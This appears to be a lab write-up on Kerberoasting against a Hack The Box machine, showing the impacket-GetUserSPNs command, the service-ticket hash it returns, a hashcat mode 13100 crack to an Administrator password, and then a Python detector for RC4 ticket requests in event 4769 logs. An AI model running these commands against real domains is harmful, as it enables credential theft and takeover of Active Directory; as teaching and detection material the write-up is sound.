GetUserSPNs

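1. Overview

This tool retrieves the password hashes of service accounts (svc_XXX) in an AD environment through legitimate means, that is, ordinary Kerberos requests. SPN stands for Service Principal Name, the name that identifies a service and is registered on the account the service runs under.

The tool searches the user accounts in AD for those that have the SPN attribute set. It then asks the DC for a TGS (service ticket) for each account it finds.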

2. Usage

2.1. Basic usage

Running the command below creates the file GetUserSPNs.out.

┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# impacket-GetUserSPNs -request -dc-ip 10.129.48.114 active.htb/SVC_TGS:GPPstillStandingStrong2k18 -save -outputfile GetUserSPNs.out
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies 

ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                   Delegation 
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------  ----------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 23:06:40.351723  2025-12-29 10:03:46.278540             



[-] CCache file is not found. Skipping...
                                                                                                                                                                                                                                            
┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# ls
Administrator.ccache  GetUserSPNs.out  Groups.xml

That file contains the password hash we are after.

┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# cat GetUserSPNs.out    
$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$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

The hash can then be cracked with hashcat mode 13100.

┌──(root㉿kali)-[/home/kali/labs/active/active-2]
└─# hashcat -m 13100 GetUserSPNs.out /usr/share/wordlists/rockyou.txt       
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 6.0+debian  Linux, None+Asserts, RELOC, SPIR-V, LLVM 18.1.8, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
============================================================================================================================================
* Device #1: cpu--0x000, 2909/5883 MB (1024 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

[...SNIP...]

$krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Administrator*$7220689ba00da903606f574e1ab8e0fe$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:Ticketmaster1968
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*Administrator$ACTIVE.HTB$active.htb/Ad...e153e9
Time.Started.....: Mon Dec 29 11:10:17 2025 (3 secs)
Time.Estimated...: Mon Dec 29 11:10:20 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  3089.2 kH/s (0.50ms) @ Accel:512 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10539008/14344385 (73.47%)
Rejected.........: 0/10539008 (0.00%)
Restore.Point....: 10536960/14344385 (73.46%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Tiffany95 -> Thelittlemermaid
Hardware.Mon.#1..: Util: 78%

Started: Mon Dec 29 11:10:16 2025
Stopped: Mon Dec 29 11:10:22 2025

After these steps, the recovered plaintext password can be used to access services such as SMB.
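The detection side of the request shown above, as an added example that is not part of the original page: it scans Windows Security event 4769 (Kerberos service ticket requested) records for RC4 tickets (etype 23, `0x17`, the type hashcat mode 13100 handles) issued for user-account services. The events, account names, addresses and the `find_rc4_ticket_requests` function are constructed for illustration.

```python
from collections import defaultdict
from datetime import datetime, timedelta

RC4_HMAC = 0x17  # etype 23, as reported in the hashcat Hash.Mode line

FIELDS = ("time", "TargetUserName", "ServiceName", "TicketEncryptionType", "IpAddress")
# Constructed sample of event 4769 fields (not real log data).
EVENTS = [dict(zip(FIELDS, row)) for row in [
    ("2025-12-29T10:00:00", "alice@LAB.EXAMPLE", "FILE01$",    "0x12", "::ffff:192.0.2.20"),
    ("2025-12-29T10:01:00", "alice@LAB.EXAMPLE", "svc_legacy", "0x17", "::ffff:192.0.2.20"),
    ("2025-12-29T10:02:00", "jdoe@LAB.EXAMPLE",  "svc_sql",    "0x17", "::ffff:192.0.2.66"),
    ("2025-12-29T10:02:01", "jdoe@LAB.EXAMPLE",  "svc_web",    "0x17", "::ffff:192.0.2.66"),
    ("2025-12-29T10:02:02", "jdoe@LAB.EXAMPLE",  "svc_backup", "0x17", "::ffff:192.0.2.66"),
    ("2025-12-29T10:02:03", "jdoe@LAB.EXAMPLE",  "krbtgt",     "0x17", "::ffff:192.0.2.66"),
    ("2025-12-29T10:02:04", "jdoe@LAB.EXAMPLE",  "DC01$",      "0x17", "::ffff:192.0.2.66"),
]]

def find_rc4_ticket_requests(events, window=timedelta(minutes=5), threshold=2):
    """Return {(requester, ip): [services]} for requesters that obtained RC4
    tickets for at least `threshold` distinct user-account services in `window`."""
    per_requester = defaultdict(list)
    for ev in events:
        service = ev["ServiceName"]
        if int(ev["TicketEncryptionType"], 16) != RC4_HMAC:
            continue  # AES tickets are not what mode 13100 targets
        if service.endswith("$") or service.lower() == "krbtgt":
            continue  # machine accounts and krbtgt have random, long keys
        when = datetime.fromisoformat(ev["time"])
        per_requester[(ev["TargetUserName"], ev["IpAddress"])].append((when, service))

    flagged = {}
    for key, requests in per_requester.items():
        requests.sort()
        # Slide a window starting at each request and count distinct services.
        for i, (start, _) in enumerate(requests):
            services = {s for t, s in requests[i:] if t - start <= window}
            if len(services) >= threshold:
                flagged[key] = sorted(services)
                break
    return flagged

if __name__ == "__main__":
    for (user, ip), services in find_rc4_ticket_requests(EVENTS).items():
        print(f"{user} from {ip}: RC4 tickets for {', '.join(services)}")
```

Where AES is enforced for service accounts, `threshold=1` is the more useful setting, since any RC4 service ticket for a user account is then unexpected.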
